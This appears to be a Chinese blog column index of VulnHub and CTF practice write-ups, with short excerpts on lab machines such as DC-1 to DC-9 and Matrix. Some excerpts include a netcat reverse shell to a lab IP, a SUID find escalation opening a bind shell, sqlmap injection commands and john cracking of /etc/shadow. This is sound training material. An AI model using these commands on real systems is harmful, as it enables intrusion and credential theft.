靶机
文章平均质量分 85
devil8123665
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
VulnHub breach1.0
配置靶机网络作者提示:The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet.意思是靶机已经配置了静态IP地址为192.168.110.140,所以为了和靶机通行需要把kali主机的网卡设置一下。这里在virtualbox中可以配置一块新的网卡,为了在同一地址段,设置如下。然后让靶机和kali原创 2021-12-03 19:25:46 · 1007 阅读 · 0 评论 -
Pikachu靶场----答案集合
题记 这个靶场是在内推圈爷一个采访在顺风的一个安全小哥视频里那个小哥分享的,巧的是我当时正在找靶场,真是感觉有时候一些事情很奇妙,你刚好需要的时候它正好出现。此靶场名为皮卡丘靶场,可爱中透着一股霸气,搭建环境为phpstudy+mysql。可以在靶场里面玩玩kali,菜刀等高级渗透。我搭建的虚拟环境有win10,win8,linux。 这篇文章属于我在网上查找的比较好的这个靶场答案解析,用于“日”后查阅。不定期更新。 Pikachu靶场----X...转载 2021-04-30 14:28:13 · 1618 阅读 · 0 评论 -
php伪协议实现命令执行的七种姿势
首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data:/转载 2021-01-26 09:37:26 · 402 阅读 · 0 评论 -
封神台靶场 绕过防护getshell
封神台https://hack.zkaq.cn/battle靶场http://59.63.200.79:8003/bees/一 爬取方法1 针对本题目而言,是很简单的,只需要暴出站点的目录就能在根目录下找到flag.txt御剑扫描:需要在御剑的字典中添加flag.txt等相关关键字访问链接即可获得flag值。2 或者使用其他的爬虫或者是扫描工具只要能获的站点目录,就能找到flag.txt二 注入方法1 通过kali dirb 暴出目录,找到http://59.6.原创 2020-09-24 14:57:35 · 4617 阅读 · 0 评论 -
Vulnhub靶机实战——Matrix3
Vulnhub靶机实战——Matrix3https://cloud.tencent.com/developer/article/1472396https://blog.csdn.net/weixin_43583637/article/details/103085871转载 2020-08-22 14:23:29 · 242 阅读 · 0 评论 -
提权相关网站
1、linux提权方法(不断总结更新)https://www.cnblogs.com/zaqzzz/p/12075132.html2、Linux 提权https://blog.csdn.net/silentpebble/article/details/392328373、Linux提权中常见命令大全https://www.cnblogs.com/-qing-/p/10610827.html4、Linux 提权的各种姿势总结https://blog.csdn.net/zhalan.转载 2020-08-21 14:40:11 · 415 阅读 · 0 评论 -
Vulnhub靶机实战——Matrix2
Vulnhub靶机实战——Matrix2https://blog.csdn.net/weixin_43583637/article/details/102999591转载 2020-08-21 14:27:35 · 424 阅读 · 0 评论 -
vulnhub靶机实战——Matrix_1
vulnhub靶机实战——Matrix_1https://blog.csdn.net/weixin_43583637/article/details/102845860转载 2020-08-21 11:08:42 · 339 阅读 · 0 评论 -
十一 Vulnhub靶机实战——DC-7
Vulnhub靶机实战——DC-7https://blog.csdn.net/weixin_43583637/article/details/102809227https://www.cnblogs.com/ph1sh/p/12150346.html转载 2020-08-02 22:20:39 · 258 阅读 · 0 评论 -
十 Vulnhub靶机实战——DC-5
Vulnhub靶机实战——DC-5https://blog.csdn.net/weixin_43583637/article/details/102769923https://www.jianshu.com/p/8f6e1e4d44b9转载 2020-08-02 18:55:52 · 296 阅读 · 0 评论 -
九 Vulnhub靶机实战——DC-4
Vulnhub靶机实战——DC-4https://blog.csdn.net/weixin_43583637/article/details/101556645转载 2020-08-01 18:30:06 · 271 阅读 · 0 评论 -
八 Vulnhub靶机实战——DC-6
Vulnhub靶机实战——DC-6https://blog.csdn.net/weixin_43583637/article/details/102785246转载 2020-07-28 16:22:44 · 253 阅读 · 0 评论 -
七 vulnhub系列 DC3靶机
sqlmap注入语句1暴库sqlmap -u "http://192.168.190.188/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1" --dbs -p list[fullordering] --batch2 暴表sqlmap -u "http://192.168.190.188/index.php?option=com_fields&view=field转载 2020-07-27 22:37:15 · 247 阅读 · 0 评论 -
六 、Vulnhub靶机实战——DC-2
Vulnhub靶机实战——DC-2https://blog.csdn.net/weixin_43583637/article/details/101552825转载 2020-07-23 18:34:17 · 225 阅读 · 0 评论 -
靶场提权总结
1 find root权限提权find / -perm -u=s -type f 2>/dev/null查看find权限find /var/www/index.php -exec whoami \;返回为“root”设置nc 反弹shellfind /var/www/index.php -exec nc -lvp 9999 -e /bin/sh \;2 exim4 提权find / -perm -u=s -type f 2>/dev/null找到root权原创 2020-07-21 11:55:46 · 2795 阅读 · 0 评论 -
五 Vulnhub-DC1靶机渗透
Vulnhub-DC1靶机渗透https://blog.csdn.net/adminuil/article/details/101269264转载 2020-07-21 11:34:38 · 330 阅读 · 0 评论 -
四 vulnhub靶机DC-9渗透测试
vulnhub靶机DC-9渗透测试https://blog.csdn.net/Long_gone/article/details/104049869Port-knocking 简单教程https://www.cnblogs.com/xiaoxiaoleo/p/8523322.html转载 2020-07-20 19:26:10 · 328 阅读 · 0 评论 -
三 Vulnhub靶机实战——DC-8
https://blog.csdn.net/weixin_43583637/article/details/102828013在执行getshell.sh时报错www-data@dc-8:/tmp$ ./getshell.sh -m netchat./getshell.sh -m netchatbash: ./getshell.sh: /bin/bash^M: bad interpreter: No such file or directory原因是文档格式不对使用vim 打开getsh转载 2020-07-20 15:43:42 · 281 阅读 · 0 评论 -
二 CH4INRULZ_v1.0.1
二 CH4INRULZ_v1.0.11 john暴破密码讲账号,更改为/etc/passwd的账号格式,。例如破解kali下的账号密码第一步:unshadow /etc/passwd /etc/shadow > shadow_test第二部:john shadow_test便可以破解账号,如果破解过一次,可以使用john –show shadow_test 查看结果,或者...原创 2020-02-15 19:31:34 · 433 阅读 · 0 评论 -
一、Nulldog2
1 nc反弹代码rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.151 1234 >/tmp/f;2 python 开启shell终端python -c 'import pty;pty.spawn("/bin/bash")'原创 2020-02-15 19:23:06 · 221 阅读 · 0 评论
分享